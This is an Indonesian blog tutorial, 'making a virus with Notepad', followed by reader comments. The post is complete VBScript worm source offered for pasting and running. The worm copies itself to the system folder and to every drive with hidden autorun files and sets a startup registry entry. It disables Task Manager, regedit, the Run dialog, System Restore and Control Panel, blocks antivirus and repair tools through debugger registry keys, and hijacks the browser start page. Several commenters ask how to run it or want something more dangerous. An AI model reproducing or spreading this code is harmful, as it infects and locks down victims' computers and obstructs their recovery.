MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD
1. Buka Notepad
2. Copy kan kode dibawah ini:
on error resume next
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(”Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(”WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
3. Simpan dengan nama Mila.sys.vbs
penulis: smile_netstar@yahoo.com
zoel chaniago Berkata:
on Mei 18, 2008 at 12:31 pm
hmmm efek nya apa aja nich/???
akbarkid Berkata:
on Mei 19, 2008 at 5:00 am
efek nya sih ngak terlalu bahaya kalo ngak sala cuma regedit nya ngak bisa kebuka, munjul gambar acak di menu properties dan yg pasti bisa membuat kaspersky 7 ke atas teriak minta ampun
win Berkata:
on Juni 30, 2008 at 7:21 am
GGGGOOOOOOOOOOOOOOOOOOODDDDDDDDDDDDDDDDDDDDD……………………………
ariandik Berkata:
on Juli 10, 2008 at 8:53 am
tu cara ngejalaninnya gmana …..?
apa mharus klik kanan dulu ,lalu open….?
Shafry Berkata:
on Juli 30, 2008 at 9:40 am
Ada yang lebih bahaya lg g?
Jati Berkata:
on September 14, 2008 at 6:45 am
Mas klo ngajarin virus dr dasar dlu. Diksh tau fungsinya apa. Trs jgn terlalu yg berbahaya. Kshn yg bru blajar kmptrnya pasti eror. Trs diksh antivirusnya. Itu bru bagus. Saya lht virus yg dibuat ckp berbhya utk pemula. Run,view,tools,task manager hlg.
Jati Berkata:
on Oktober 16, 2008 at 1:59 pm
Mas klo ngasih info virus skalian antidotnya ya
rifma Berkata:
on Nopember 5, 2008 at 3:41 am
kok kurang lengkap sich, eek n media penyimpanannya gimana? klo aku buat di notebok ku,apa notebok ku juga kena virus juga.
galih Berkata:
on Nopember 25, 2008 at 3:49 am
wahh komputer ku kena dampaknya tu byar ketangkep pake anti virus appa????
hasrul Berkata:
on Desember 3, 2008 at 6:33 am
Mas,,,,saya kan udah simpan tuh nama virusnya………pake notepad.
kemudian cara kita jalankan virusnya di windows,, gimana seh????
medicasmart Berkata:
on Desember 4, 2008 at 8:30 am
medicasmart DOKTER virus Komputer
PaRa PeNcArI ViRuS MaKeR Berkata:
on Desember 19, 2008 at 7:04 am
Gmana cara jalanin efeknya?
PaRa PeNcArI ViRuS MaKeR
IMBANG Berkata:
on Januari 1, 2009 at 8:43 am
makyusss..
IMBANG Berkata:
on Januari 1, 2009 at 8:45 am
Mas.. cara kerkanya aNTI virusnya tu gmn..??
auto play.. apa flasdiknya harus dibuka dlu baru virus berjalann..??
Captain_kolor Berkata:
on Januari 13, 2009 at 11:43 am
Aje Gile….bahaya bgt tuh klo ga da script antivirusnya,sebelum bikin virus bikin dulu anti virusnya donk.
ardee Berkata:
on Januari 17, 2009 at 3:53 am
Mangnya tu g kebaca sm AV?
w ja bkn yg cm bwt “nampang” dkomp aj kebaca, tp sm SMADAV & PCMAV!
Pdhal isinya cm ky gini LegalNoticeCaption & HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
Ngga jahat kan? Tp tetep kebaca? Ms si yg kaya diatas g kebaca sm AV?
dhonny Berkata:
on Januari 19, 2009 at 9:26 am
thaks ya dah mo berbagi ilmu
devilsmart Berkata:
on Januari 28, 2009 at 6:05 am
virusnya khan ada…….. terus antu virusnya…????????
Hacker-Center Berkata:
on Januari 29, 2009 at 5:07 am
BAD!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Chiemon Berkata:
on Februari 6, 2009 at 9:40 am
Mas,, sekalian ma Anti Virusnya donk..!!! Please…!!!
HACKER CENTER Berkata:
on Februari 17, 2009 at 8:32 am
banyak banget???? di http://www.bladex.tk loch ada yang lebih simple tapi mematikan . . . >>>>
zoe Berkata:
on Juni 4, 2009 at 4:20 am
ehm….
ehm…
klo yg gne mach mci krag “sErEm” wat kOmP gW !!!
wAt Yg lbH “sErEm” 9e dUnKz mAz ???